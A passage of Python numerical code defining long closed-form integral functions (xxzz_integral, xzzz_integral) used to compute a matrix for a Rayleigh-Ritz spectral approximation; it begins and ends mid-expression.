+ a ** 7 * a_conj ** 5 * (29 + 3 * a_conj ** 2 + 51 * b)
+ a ** 6
* (
9 * a_conj ** 8
+ a_conj ** 6 * (13 + 15 * b)
+ 10 * a_conj ** 4 * (2 + 7 * b + 12 * b ** 2)
)
+ a ** 2
* (
6 * (-1 + b) ** 6
+ a_conj ** 2 * (-1 + b) ** 4 * (-1 + 3 * b)
+ 5
* a_conj ** 4
* (-1 + b) ** 2
* (11 + 16 * b + 21 * b ** 2)
)
+ a ** 5
* (
a_conj ** 7 * (29 + 51 * b)
+ a_conj ** 5 * (-32 + 26 * b + 30 * b ** 2)
+ 30 * a_conj ** 3 * (1 + 5 * b ** 3)
)
+ a ** 3
* (
a_conj * (-1 + b) ** 4 * (31 + 39 * b)
+ a_conj ** 3
* (-1 + b) ** 2
* (-7 + 4 * b + 15 * b ** 2)
+ 30 * a_conj ** 5 * (1 + 5 * b ** 3)
)
+ a ** 4
* (
10 * a_conj ** 6 * (2 + 7 * b + 12 * b ** 2)
+ 5
* a_conj ** 2
* (-1 + b) ** 2
* (11 + 16 * b + 21 * b ** 2)
+ 6 * a_conj ** 4 * (-8 - 9 * b + 5 * b ** 3)
)
)
)
+ 1
/ (1 + x ** 2)
* (
18 * a ** 9 * a_conj ** 7
+ 3 * a_conj ** 2 * (-1 + b) ** 7
+ 2 * a * a_conj ** 3 * (-1 + b) ** 5 * (13 + 12 * b)
+ a ** 8 * a_conj ** 6 * (101 + 3 * a_conj ** 2 + 99 * b)
+ 2
* a ** 7
* a_conj ** 5
* (
29
+ 9 * a_conj ** 4
+ 167 * b
+ 114 * b ** 2
+ a_conj ** 2 * (62 + 6 * b)
)
+ a ** 2
* (
3 * (-1 + b) ** 7
- a_conj ** 2 * (-1 + b) ** 5 * (-1 + 3 * b)
+ a_conj ** 4
* (-1 + b) ** 3
* (103 + 154 * b + 93 * b ** 2)
)
+ 2
* a ** 3
* a_conj
* (-1 + b)
* (
(-1 + b) ** 4 * (13 + 12 * b)
- 2
* a_conj ** 2
* (-1 + b) ** 2
* (-2 + b + 3 * b ** 2)
+ 5
* a_conj ** 4
* (23 + 29 * b + 29 * b ** 2 + 21 * b ** 3)
)
+ a ** 6
* (
a_conj ** 8 * (101 + 99 * b)
+ a_conj ** 6 * (161 + 356 * b + 15 * b ** 2)
+ 5
* a_conj ** 4
* (-35 + 37 * b + 73 * b ** 2 + 57 * b ** 3)
)
+ a ** 4
* (
a_conj ** 2
* (-1 + b) ** 3
* (103 + 154 * b + 93 * b ** 2)
+ 5
* a_conj ** 6
* (-35 + 37 * b + 73 * b ** 2 + 57 * b ** 3)
+ a_conj ** 4
* (
-91
- 180 * b
+ 162 * b ** 2
+ 124 * b ** 3
- 15 * b ** 4
)
)
+ 2
* a ** 5
* a_conj ** 3
* (
2 * a_conj ** 2 * (-11 + 76 * b + 85 * b ** 2)
+ a_conj ** 4 * (29 + 167 * b + 114 * b ** 2)
+ 5 * (-23 - 6 * b + 8 * b ** 3 + 21 * b ** 4)
)
)
- 1
/ (
b
* (
a ** 2 * a_conj ** 2
+ 2 * a * a_conj * (b - x ** 2)
+ (b + x ** 2) ** 2
)
)
* (
3
* a ** 2
* a_conj ** 2
* (a + a_conj) ** 2
* (
a ** 7 * a_conj ** 7
- a ** 6 * a_conj ** 6 * (-4 + 5 * b + x ** 2)
+ a ** 5
* a_conj ** 5
* (6 - 35 * b ** 2 - 4 * x ** 2 - 2 * b * (-4 + x ** 2))
+ a ** 4
* a_conj ** 4
* (
4
- 65 * b ** 3
- 6 * x ** 2
+ b * (30 - 20 * x ** 2)
+ 5 * b ** 2 * (-4 + x ** 2)
)
+ (-1 + b) ** 3
* b ** 2
* (5 * b ** 2 + 5 * x ** 2 + 3 * b * (1 + x ** 2))
+ a ** 3
* a_conj ** 3
* (
1
- 45 * b ** 4
- 4 * x ** 2
+ b ** 2 * (60 - 40 * x ** 2)
+ 20 * b ** 3 * (-4 + x ** 2)
- 8 * b * (-2 + 3 * x ** 2)
)
+ a ** 2
* a_conj ** 2
* (
b ** 5
- x ** 2
+ b ** 3 * (60 - 40 * x ** 2)
+ b ** 2 * (24 - 36 * x ** 2)
+ 25 * b ** 4 * (-4 + x ** 2)
+ b * (-1 + 4 * x ** 2)
)
+ a
* a_conj
* (-1 + b)
* b
* (
15 * b ** 4
- 10 * x ** 2
+ b * (5 - 30 * x ** 2)
- b ** 2 * (11 + 6 * x ** 2)
+ b ** 3 * (-41 + 14 * x ** 2)
)
)
)
)
)
+ 1
/ (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (9 / 2)
* (
12
* (1 + a * a_conj + b)
* (
a ** 4 * a_conj ** 2 * (-10 + 3 * a_conj ** 2)
- 10 * a_conj ** 2 * (1 + 5 * b + b ** 2)
+ 3 * (-1 + b) ** 2 * (1 + 8 * b + b ** 2)
- 4
* a
* a_conj
* (
2
+ 13 * b
- 7 * b ** 2
- 3 * b ** 3
+ 5 * a_conj ** 2 * (1 + b)
)
+ 4
* a ** 3
* (-5 * a_conj * (1 + b) + a_conj ** 3 * (-2 + 3 * b))
- 2
* a ** 2
* (
5 * a_conj ** 4
+ 5 * (1 + 5 * b + b ** 2)
- a_conj ** 2 * (-11 + b + 9 * b ** 2)
)
)
* np.log(
a * a_conj
- b
+ (a * a_conj + b) ** 2
+ np.sqrt((a * a_conj + b) ** 2)
* np.sqrt(1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2)
)
)
+ 1
/ (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (9 / 2)
* (
12
* (1 + a * a_conj + b)
* (
a ** 4 * a_conj ** 2 * (-10 + 3 * a_conj ** 2)
- 10 * a_conj ** 2 * (1 + 5 * b + b ** 2)
+ 3 * (-1 + b) ** 2 * (1 + 8 * b + b ** 2)
- 4
* a
* a_conj
* (
2
+ 13 * b
- 7 * b ** 2
- 3 * b ** 3
+ 5 * a_conj ** 2 * (1 + b)
)
+ 4
* a ** 3
* (-5 * a_conj * (1 + b) + a_conj ** 3 * (-2 + 3 * b))
- 2
* a ** 2
* (
5 * a_conj ** 4
+ 5 * (1 + 5 * b + b ** 2)
- a_conj ** 2 * (-11 + b + 9 * b ** 2)
)
)
* np.log(1 + x ** 2)
)
- 1
/ (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (9 / 2)
* (
12
* (1 + a * a_conj + b)
* (
a ** 4 * a_conj ** 2 * (-10 + 3 * a_conj ** 2)
- 10 * a_conj ** 2 * (1 + 5 * b + b ** 2)
+ 3 * (-1 + b) ** 2 * (1 + 8 * b + b ** 2)
- 4
* a
* a_conj
* (
2
+ 13 * b
- 7 * b ** 2
- 3 * b ** 3
+ 5 * a_conj ** 2 * (1 + b)
)
+ 4
* a ** 3
* (-5 * a_conj * (1 + b) + a_conj ** 3 * (-2 + 3 * b))
- 2
* a ** 2
* (
5 * a_conj ** 4
+ 5 * (1 + 5 * b + b ** 2)
- a_conj ** 2 * (-11 + b + 9 * b ** 2)
)
)
* np.log(
a * a_conj
- b
+ (a * a_conj + b) ** 2
- x ** 2
- a * a_conj * x ** 2
+ b * x ** 2
+ np.sqrt(1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2)
* np.sqrt(
a ** 2 * a_conj ** 2
+ 2 * a * a_conj * (b - x ** 2)
+ (b + x ** 2) ** 2
)
)
)
)
)
return 4 / 1j * np.pi * c * ret
if abs(a_conj) < 0.00000001:
return 0
def xxzz_integral(a, b, c, x):
"""
function involved in computing the a_matrix (Rayleigh Ritz approx of the spectrum)
@param a:
@param b:
@param c:
@param x:
@return:
"""
a_conj = np.conj(a)
if abs(a_conj) >= 0.00000001:
ret = (
1
/ 6
* (
1 / a ** 2
+ 1 / a_conj ** 2
- 1
/ (
a ** 2
* a_conj ** 2
* b
* (a ** 2 * a_conj ** 2 + (-1 + b) ** 2 + 2 * a * a_conj * (1 + b))
** 4
)
* (
np.sqrt((a * a_conj + b) ** 2)
* (
a ** 9 * a_conj ** 7 * (-3 + b)
- a ** 8 * a_conj ** 6 * (6 + 6 * a_conj ** 2 + b - 7 * b ** 2)
+ a_conj ** 2 * (-1 + b) ** 5 * b * (3 + b ** 2)
+ a
* a_conj ** 3
* (-1 + b) ** 3
* (3 + 54 * b + 38 * b ** 2 + 10 * b ** 3 + 7 * b ** 4)
+ a ** 7
* a_conj ** 5
* (
3
+ a_conj ** 4 * (-3 + b)
- 239 * b
+ 35 * b ** 2
+ 21 * b ** 3
+ 4 * a_conj ** 2 * (-3 + 4 * b)
)
+ a ** 6
* a_conj ** 4
* (
12
- 73 * b
- 691 * b ** 2
+ 85 * b ** 3
+ 35 * b ** 4
+ a_conj ** 4 * (-6 - b + 7 * b ** 2)
+ 2 * a_conj ** 2 * (3 - 220 * b + 85 * b ** 2)
)
+ a ** 5
* a_conj ** 3
* (
3
+ 523 * b
- 766 * b ** 2
- 686 * b ** 3
+ 75 * b ** 4
+ 35 * b ** 5
+ a_conj ** 4 * (3 - 239 * b + 35 * b ** 2 + 21 * b ** 3)
+ 8
* a_conj ** 2
* (3 - 26 * b - 147 * b ** 2 + 50 * b ** 3)
)
+ a ** 4
* a_conj ** 2
* (
-6
+ 317 * b
+ 565 * b ** 2
- 702 * b ** 3
- 212 * b ** 4
+ 17 * b ** 5
+ 21 * b ** 6
+ a_conj ** 4
* (12 - 73 * b - 691 * b ** 2 + 85 * b ** 3 + 35 * b ** 4)
+ 2
* a_conj ** 2
* (3 + 424 * b - 730 * b ** 2 - 504 * b ** 3 + 215 * b ** 4)
)
+ a ** 2
* (-1 + b)
* (
(-1 + b) ** 4 * b * (3 + b ** 2)
+ 2
* a_conj ** 2
* (-1 + b) ** 2
* (3 + 69 * b + 105 * b ** 2 + 23 * b ** 3)
+ a_conj ** 4
* (
6
- 311 * b
- 876 * b ** 2
- 174 * b ** 3
+ 38 * b ** 4
+ 21 * b ** 5
)
)
+ a ** 3
* (
a_conj
* (-1 + b) ** 3
* (3 + 54 * b + 38 * b ** 2 + 10 * b ** 3 + 7 * b ** 4)
+ a_conj ** 5
* (
3
+ 523 * b
- 766 * b ** 2
- 686 * b ** 3
+ 75 * b ** 4
+ 35 * b ** 5
)
+ 4
* a_conj ** 3
* (
-3
+ 120 * b
+ 274 * b ** 2
- 400 * b ** 3
- 47 * b ** 4
+ 56 * b ** 5
)
)
)
)
- 4
* (a ** 2 + a_conj ** 2)
/ (a ** 2 * a_conj ** 2 * (1 + x ** 2) ** 3)
+ 6
* (a ** 2 + a_conj ** 2)
/ (a ** 2 * a_conj ** 2 * (1 + x ** 2) ** 2)
- 3 * (a ** 2 + a_conj ** 2) / (a ** 2 * a_conj ** 2 * (1 + x ** 2))
+ 1
/ (
a ** 2
* a_conj ** 2
* (a ** 2 * a_conj ** 2 + (-1 + b) ** 2 + 2 * a * a_conj * (1 + b))
** 4
)
* (
np.sqrt(
(a * a_conj + b) ** 2
- 2 * a * a_conj * x ** 2
+ 2 * b * x ** 2
+ x ** 4
)
* (
4
* (
a ** 2 * a_conj ** 2
+ (-1 + b) ** 2
+ 2 * a * a_conj * (1 + b)
)
** 2
* (
a ** 5 * a_conj ** 3
+ a_conj ** 2 * (-1 + b) ** 3
+ 3 * a ** 4 * a_conj ** 2 * (1 + b)
+ 3 * a * a_conj ** 3 * (-1 + b ** 2)
+ a ** 3
* a_conj
* (-3 + 4 * a_conj ** 2 + a_conj ** 4 + 3 * b ** 2)
+ a ** 2
* (
4 * a_conj ** 2 * (-1 + b)
+ (-1 + b) ** 3
+ 3 * a_conj ** 4 * (1 + b)
)
)
/ (1 + x ** 2) ** 3
- 1
/ (1 + x ** 2) ** 2
* (
2
* (
a ** 2 * a_conj ** 2
+ (-1 + b) ** 2
+ 2 * a * a_conj * (1 + b)
)
* (
3 * a ** 7 * a_conj ** 5
+ a_conj ** 2 * (-1 + b) ** 4 * (-1 + 3 * b)
+ a ** 6 * a_conj ** 4 * (13 + 15 * b)
+ a
* a_conj ** 3
* (-1 + b) ** 2
* (-7 + 4 * b + 15 * b ** 2)
+ a ** 5
* a_conj ** 3
* (
-32
+ 24 * a_conj ** 2
+ 3 * a_conj ** 4
+ 26 * b
+ 30 * b ** 2
)
+ a ** 3
* (
24 * a_conj ** 3 * (-2 - 3 * b + 3 * b ** 2)
+ a_conj
* (-1 + b) ** 2
* (-7 + 4 * b + 15 * b ** 2)
+ a_conj ** 5 * (-32 + 26 * b + 30 * b ** 2)
)
+ a ** 4
* (
8 * a_conj ** 4 * (-4 + 9 * b)
+ a_conj ** 6 * (13 + 15 * b)
+ 6 * a_conj ** 2 * (-8 - 9 * b + 5 * b ** 3)
)
+ a ** 2
* (
(-1 + b) ** 4 * (-1 + 3 * b)
+ 8 * a_conj ** 2 * (-1 + b) ** 2 * (1 + 3 * b)
+ 6 * a_conj ** 4 * (-8 - 9 * b + 5 * b ** 3)
)
)
)
+ 1
/ (1 + x ** 2)
* (
3 * a ** 9 * a_conj ** 7
+ 3 * a ** 8 * a_conj ** 6 * (5 + 7 * b)
+ a_conj ** 2 * (-1 + b) ** 5 * (1 + 3 * b ** 2)
+ a ** 7
* a_conj ** 5
* (
-203
+ 60 * a_conj ** 2
+ 3 * a_conj ** 4
+ 60 * b
+ 63 * b ** 2
)
+ a
* a_conj ** 3
* (-1 + b) ** 3
* (5 - 13 * b + 3 * b ** 2 + 21 * b ** 3)
+ a ** 6
* a_conj ** 4
* (
-295
- 661 * b
+ 75 * b ** 2
+ 105 * b ** 3
+ 3 * a_conj ** 4 * (5 + 7 * b)
+ 12 * a_conj ** 2 * (-21 + 25 * b)
)
+ a ** 5
* a_conj ** 3
* (
61
- 632 * b
- 734 * b ** 2
+ 105 * b ** 4
+ a_conj ** 4 * (-203 + 60 * b + 63 * b ** 2)
+ 8 * a_conj ** 2 * (-49 - 102 * b + 75 * b ** 2)
)
+ a ** 4
* a_conj ** 2
* (
137
+ 411 * b
- 270 * b ** 2
- 266 * b ** 3
- 75 * b ** 4
+ 63 * b ** 5
+ 8
* a_conj ** 2
* (23 - 129 * b - 117 * b ** 2 + 75 * b ** 3)
+ a_conj ** 4
* (-295 - 661 * b + 75 * b ** 2 + 105 * b ** 3)
)
+ a ** 2
* (-1 + b)
* (
(-1 + b) ** 4 * (1 + 3 * b ** 2)
+ 4
* a_conj ** 2
* (-1 + b) ** 2
* (7 + 30 * b + 15 * b ** 2)
+ a_conj ** 4
* (
-137
- 548 * b
- 278 * b ** 2
- 12 * b ** 3
+ 63 * b ** 4
)
)
+ a ** 3
* (
a_conj
* (-1 + b) ** 3
* (5 - 13 * b + 3 * b ** 2 + 21 * b ** 3)
+ 4
* a_conj ** 3
* (
59
+ 172 * b
- 198 * b ** 2
- 108 * b ** 3
+ 75 * b ** 4
)
+ a_conj ** 5
* (61 - 632 * b - 734 * b ** 2 + 105 * b ** 4)
)
)
- 1
/ (
b
* (
a ** 2 * a_conj ** 2
+ 2 * a * a_conj * (b - x ** 2)
+ (b + x ** 2) ** 2
)
)
* (
3
* a
* a_conj
* (a + a_conj) ** 2
* (
a ** 8 * a_conj ** 8
+ a ** 7 * a_conj ** 7 * (2 + 4 * b - x ** 2)
- (-1 + b) ** 3
* b
* (1 + b)
* (
b
+ 3 * b ** 3
+ 3 * x ** 2
+ 12 * b * x ** 2
+ b ** 2 * (12 + x ** 2)
)
+ a ** 5
* a_conj ** 5
* (
-4
- 28 * b ** 3
+ x ** 2
+ b * (2 - 20 * x ** 2)
- 7 * b ** 2 * (-22 + 3 * x ** 2)
)
- a ** 4
* a_conj ** 4
* (
1
+ 70 * b ** 4
- 4 * x ** 2
+ b * (84 - 41 * x ** 2)
+ 35 * b ** 2 * (-3 + 2 * x ** 2)
+ 5 * b ** 3 * (-54 + 7 * x ** 2)
)
- a ** 6
* a_conj ** 6
* (1 + 2 * x ** 2 + b * (-38 + 7 * x ** 2))
- a
* a_conj
* (-1 + b)
* (
20 * b ** 6
- x ** 2
+ b ** 2 * (24 - 122 * x ** 2)
+ b * (2 - 29 * x ** 2)
- 14 * b ** 3 * (4 + 3 * x ** 2)
+ b ** 5 * (22 + 7 * x ** 2)
+ b ** 4 * (-140 + 59 * x ** 2)
)
+ a ** 3
* a_conj ** 3
* (
2
- 84 * b ** 5
+ x ** 2
+ 40 * b * (-1 + 2 * x ** 2)
- 5 * b ** 4 * (-46 + 7 * x ** 2)
- 4 * b ** 3 * (-79 + 30 * x ** 2)
+ 2 * b ** 2 * (-116 + 69 * x ** 2)
)
+ a ** 2
* a_conj ** 2
* (
1
- 56 * b ** 6
- 2 * x ** 2
+ b ** 4 * (353 - 110 * x ** 2)
+ b ** 5 * (82 - 21 * x ** 2)
+ b * (14 - 5 * x ** 2)
+ 2 * b ** 2 * (-49 + 76 * x ** 2)
+ 2 * b ** 3 * (-116 + 89 * x ** 2)
)
)
)
)
)
+ 1
/ (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (9 / 2)
* (
12
* (1 + a * a_conj + b)
* (
a ** 6 * a_conj ** 4 * (-9 + a_conj ** 2)
+ (-1 + b) ** 4 * (1 + 6 * b + b ** 2)
- 3 * a_conj ** 2 * (-1 + b) ** 2 * (3 + 14 * b + 3 * b ** 2)
+ 2
* a
* a_conj
* (-1 + b) ** 2
* (-8 - 45 * b + 2 * b ** 2 + 3 * b ** 3)
- 4 * a * a_conj ** 3 * (-1 - 29 * b + 11 * b ** 2 + 9 * b ** 3)
+ 2
* a ** 5
* a_conj ** 3
* (2 - 18 * b + a_conj ** 2 * (-8 + 3 * b))
+ a ** 4
* a_conj ** 2
* (
26
- 9 * a_conj ** 4
- 16 * b
- 54 * b ** 2
+ a_conj ** 2 * (7 - 62 * b + 15 * b ** 2)
)
- 4
* a ** 3
* a_conj
* (
-1
- 29 * b
+ 11 * b ** 2
+ 9 * b ** 3
+ a_conj ** 4 * (-1 + 9 * b)
+ a_conj ** 2 * (-12 + 11 * b + 22 * b ** 2 - 5 * b ** 3)
)
- a ** 2
* (
3 * (-1 + b) ** 2 * (3 + 14 * b + 3 * b ** 2)
+ 2 * a_conj ** 4 * (-13 + 8 * b + 27 * b ** 2)
+ a_conj ** 2
* (-7 - 204 * b + 126 * b ** 2 + 52 * b ** 3 - 15 * b ** 4)
)
)
* np.arctanh(
(
a ** 2 * a_conj ** 2
+ (-1 + b) * b
+ a * (a_conj + 2 * a_conj * b)
)
/ (
np.sqrt((a * a_conj + b) ** 2)
* np.sqrt(
a ** 2 * a_conj ** 2
+ (-1 + b) ** 2
+ 2 * a * a_conj * (1 + b)
)
)
)
)
- 1
/ (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (9 / 2)
* (
12
* (1 + a * a_conj + b)
* (
a ** 6 * a_conj ** 4 * (-9 + a_conj ** 2)
+ (-1 + b) ** 4 * (1 + 6 * b + b ** 2)
- 3 * a_conj ** 2 * (-1 + b) ** 2 * (3 + 14 * b + 3 * b ** 2)
+ 2
* a
* a_conj
* (-1 + b) ** 2
* (-8 - 45 * b + 2 * b ** 2 + 3 * b ** 3)
- 4 * a * a_conj ** 3 * (-1 - 29 * b + 11 * b ** 2 + 9 * b ** 3)
+ 2
* a ** 5
* a_conj ** 3
* (2 - 18 * b + a_conj ** 2 * (-8 + 3 * b))
+ a ** 4
* a_conj ** 2
* (
26
- 9 * a_conj ** 4
- 16 * b
- 54 * b ** 2
+ a_conj ** 2 * (7 - 62 * b + 15 * b ** 2)
)
- 4
* a ** 3
* a_conj
* (
-1
- 29 * b
+ 11 * b ** 2
+ 9 * b ** 3
+ a_conj ** 4 * (-1 + 9 * b)
+ a_conj ** 2 * (-12 + 11 * b + 22 * b ** 2 - 5 * b ** 3)
)
- a ** 2
* (
3 * (-1 + b) ** 2 * (3 + 14 * b + 3 * b ** 2)
+ 2 * a_conj ** 4 * (-13 + 8 * b + 27 * b ** 2)
+ a_conj ** 2
* (-7 - 204 * b + 126 * b ** 2 + 52 * b ** 3 - 15 * b ** 4)
)
)
* np.arctanh(
(
a ** 2 * a_conj ** 2
+ a * a_conj * (1 + 2 * b - x ** 2)
+ (-1 + b) * (b + x ** 2)
)
/ (
np.sqrt(
a ** 2 * a_conj ** 2
+ (-1 + b) ** 2
+ 2 * a * a_conj * (1 + b)
)
* np.sqrt(
a ** 2 * a_conj ** 2
+ 2 * a * a_conj * (b - x ** 2)
+ (b + x ** 2) ** 2
)
)
)
)
)
)
return 2 * np.pi * c * ret
if abs(a_conj) < 0.00000001 and (b - 1) ** 2 >= 0.00000001:
ret = (
1
/ (6 * (-1 + b) ** 5)
* (
-4 * (-1 + b) ** 3
+ 12 * (-1 + b) ** 2 * b
- 3 * (-1 + b) * (1 + b) ** 2
- 3 * (-1 + b) * (1 + b) * (1 + 5 * b)
+ 4 * (-1 + b) ** 3 / (1 + x ** 2) ** 3
- 12 * (-1 + b) ** 2 * b / (1 + x ** 2) ** 2
+ 3 * (-1 + b) * (1 + b) * (1 + 5 * b) / (1 + x ** 2)
+ 3 * (-1 + b) * b * (1 + b) ** 2 / (b + x ** 2)
+ 3 * (1 + 7 * b + 7 * b ** 2 + b ** 3) * np.log(b)
+ 3 * (1 + 7 * b + 7 * b ** 2 + b ** 3) * np.log(1 + x ** 2)
- 3 * (1 + 7 * b + 7 * b ** 2 + b ** 3) * np.log(b + x ** 2)
)
)
return 8 * np.pi * c * ret
if abs(a_conj) < 0.00000001 and (b - 1) ** 2 < 0.00000001:
ret = (
x ** 4 * (15 - 5 * x ** 2 + 5 * x ** 4 + x ** 6) / (60 * (1 + x ** 2) ** 5)
)
return 8 * np.pi * c * ret
def xzzz_integral(a, b, c, x):
"""
function involved in computing the a_matrix (Rayleigh Ritz approx of the spectrum)
@param a:
@param b:
@param c:
@param x:
@return:
"""
a_conj = np.conj(a)
if abs(a_conj) >= 0.00000001:
ret = (
1
/ (
6
* a
* a_conj
* b
* (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (9 / 2)
)
* (
(a + a_conj)
* (
-54
* (
a ** 2 * a_conj ** 2
+ 2 * a * a_conj * (1 - 5 * b)
+ (-1 + b) ** 2
)
* np.sqrt((a * a_conj + b) ** 2)
* (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (5 / 2)
- 8
* (
3 * a ** 2 * a_conj ** 2
+ a * a_conj * (6 - 22 * b)
+ 3 * (-1 + b) ** 2
)
* np.sqrt((a * a_conj + b) ** 2)
* (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (5 / 2)
+ 3
* (a * a_conj - b)
* (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (9 / 2)
/ np.sqrt((a * a_conj + b) ** 2)
- 3
* (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (7 / 2)
* (
a ** 2 * a_conj ** 2
+ (-1 + b) * b
+ a * (a_conj - 6 * a_conj * b)
)
/ np.sqrt((a * a_conj + b) ** 2)
- 8
* np.sqrt((a * a_conj + b) ** 2)
* (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (3 / 2)
* (
3 * a ** 3 * a_conj ** 3
+ a ** 2 * a_conj ** 2 * (9 - 67 * b)
- 3 * (-1 + b) ** 3
+ a * a_conj * (9 - 76 * b + 67 * b ** 2)
)
- 8
* np.sqrt((a * a_conj + b) ** 2)
* np.sqrt(1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2)
* (
3 * a ** 4 * a_conj ** 4
+ 3 * (-1 + b) ** 4
- 2 * a ** 3 * a_conj ** 3 * (-6 + 89 * b)
- 2 * a * a_conj * (-1 + b) ** 2 * (-6 + 89 * b)
+ 2 * a ** 2 * a_conj ** 2 * (9 - 184 * b + 239 * b ** 2)
)
- 3
* (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (9 / 2)
* (a * a_conj - b - x ** 2)
/ np.sqrt(
(a * a_conj + b) ** 2 - 2 * (a * a_conj - b) * x ** 2 + x ** 4
)
+ 8
* (
3 * a ** 2 * a_conj ** 2
+ a * a_conj * (6 - 22 * b)
+ 3 * (-1 + b) ** 2
)
* (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (5 / 2)
* np.sqrt(
(a * a_conj + b) ** 2 - 2 * (a * a_conj - b) * x ** 2 + x ** 4
)
/ (1 + x ** 2) ** 3
+ 8
* (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (3 / 2)
* (
3 * a ** 3 * a_conj ** 3
+ a ** 2 * a_conj ** 2 * (9 - 67 * b)
- 3 * (-1 + b) ** 3
+ a * a_conj * (9 - 76 * b + 67 * b ** 2)
)
* np.sqrt(
(a * a_conj + b) ** 2 - 2 * (a * a_conj - b) * x ** 2 + x ** 4
)
/ (1 + x ** 2) ** 2
+ 54
* (
a ** 2 * a_conj ** 2
+ 2 * a * a_conj * (1 - 5 * b)
+ (-1 + b) ** 2
)
* (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (5 / 2)
* np.sqrt(
(a * a_conj + b) ** 2 - 2 * (a * a_conj - b) * x ** 2 + x ** 4
)
/ (1 + x ** 2)
+ 8
* np.sqrt(1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2)
* (
3 * a ** 4 * a_conj ** 4
+ 3 * (-1 + b) ** 4
- 2 * a ** 3 * a_conj ** 3 * (-6 + 89 * b)
- 2 * a * a_conj * (-1 + b) ** 2 * (-6 + 89 * b)
+ 2 * a ** 2 * a_conj ** 2 * (9 - 184 * b + 239 * b ** 2)
)
* np.sqrt(
(a * a_conj + b) ** 2 - 2 * (a * a_conj - b) * x ** 2 + x ** 4
)
/ (1 + x ** 2)
+ 21
* (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (7 / 2)
* (
a ** 2 * a_conj ** 2
+ b ** 2
- x ** 2
+ b * (-1 + x ** 2)
- a * a_conj * (-1 + 6 * b + x ** 2)
)
/ np.sqrt(
(a * a_conj + b) ** 2 - 2 * (a * a_conj - b) * x ** 2 + x ** 4
)
- 24
* (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (7 / 2)
* (
a ** 2 * a_conj ** 2
+ b ** 2
- x ** 2
+ b * (-1 + x ** 2)
- a * a_conj * (-1 + 6 * b + x ** 2)
)
/ (
(1 + x ** 2) ** 3
* np.sqrt(
(a * a_conj + b) ** 2
- 2 * (a * a_conj - b) * x ** 2
+ x ** 4
)
)
+ 60
* (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (7 / 2)
* (
a ** 2 * a_conj ** 2
+ b ** 2
- x ** 2
+ b * (-1 + x ** 2)
- a * a_conj * (-1 + 6 * b + x ** 2)
)
/ (
(1 + x ** 2) ** 2
* np.sqrt(
(a * a_conj + b) ** 2
- 2 * (a * a_conj - b) * x ** 2
+ x ** 4
)
)
- 54
* (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (7 / 2)
* (
a ** 2 * a_conj ** 2
+ b ** 2
- x ** 2
+ b * (-1 + x ** 2)
- a * a_conj * (-1 + 6 * b + x ** 2)
)
/ (
(1 + x ** 2)
* np.sqrt(
(a * a_conj + b) ** 2
- 2 * (a * a_conj - b) * x ** 2
+ x ** 4
)
)
+ 648
* a
* a_conj
* (1 + a * a_conj - b)
* b
* (a ** 2 * a_conj ** 2 + (-1 + b) ** 2 + 2 * a * a_conj * (1 + b))
** 2
* np.arctanh(
(
a ** 2 * a_conj ** 2
+ (-1 + b) * b
+ a * (a_conj + 2 * a_conj * b)
)
/ (
np.sqrt((a * a_conj + b) ** 2)
* np.sqrt(
a ** 2 * a_conj ** 2
+ (-1 + b) ** 2
+ 2 * a * a_conj * (1 + b)
)
)
)
- 84
* a
* a_conj
* b
* (a ** 2 * a_conj ** 2 + (-1 + b) ** 2 + 2 * a * a_conj * (1 + b))
** 3
* np.arctanh(
(
a ** 2 * a_conj ** 2
+ (-1 + b) * b
+ a * (a_conj + 2 * a_conj * b)
)
/ (
np.sqrt((a * a_conj + b) ** 2)
* np.sqrt(
a ** 2 * a_conj ** 2
+ (-1 + b) ** 2
+ 2 * a * a_conj * (1 + b)
)
)
)
+ 960
* a
* a_conj
* b
* (
a ** 3 * a_conj ** 3
+ 3 * a ** 2 * a_conj ** 2 * (1 - 2 * b)
- (-1 + b) ** 3
+ 3 * a * a_conj * (1 - 3 * b + 2 * b ** 2)
)
* np.arctanh(
(
a ** 2 * a_conj ** 2
+ (-1 + b) * b
+ a * (a_conj + 2 * a_conj * b)
)
/ (
np.sqrt((a * a_conj + b) ** 2)
* np.sqrt(
a ** 2 * a_conj ** 2
+ (-1 + b) ** 2
+ 2 * a * a_conj * (1 + b)
)
)
)
+ 60
* (a ** 2 * a_conj ** 2 + (-1 + b) ** 2 + 2 * a * a_conj * (1 + b))
* (
(
a ** 2 * a_conj ** 2
+ a * a_conj * (2 - 8 * b)
+ (-1 + b) ** 2
)
* np.sqrt((a * a_conj + b) ** 2)
* (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2)
** (3 / 2)
+ np.sqrt((a * a_conj + b) ** 2)
* np.sqrt(1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2)
* (
a ** 3 * a_conj ** 3
+ a ** 2 * a_conj ** 2 * (3 - 29 * b)
- (-1 + b) ** 3
+ a * a_conj * (3 - 32 * b + 29 * b ** 2)
)
- 24
* a
* a_conj
* (
a ** 2 * a_conj ** 2
+ a * a_conj * (2 - 3 * b)
+ (-1 + b) ** 2
)
* b
* np.arctanh(
(
a ** 2 * a_conj ** 2
+ (-1 + b) * b
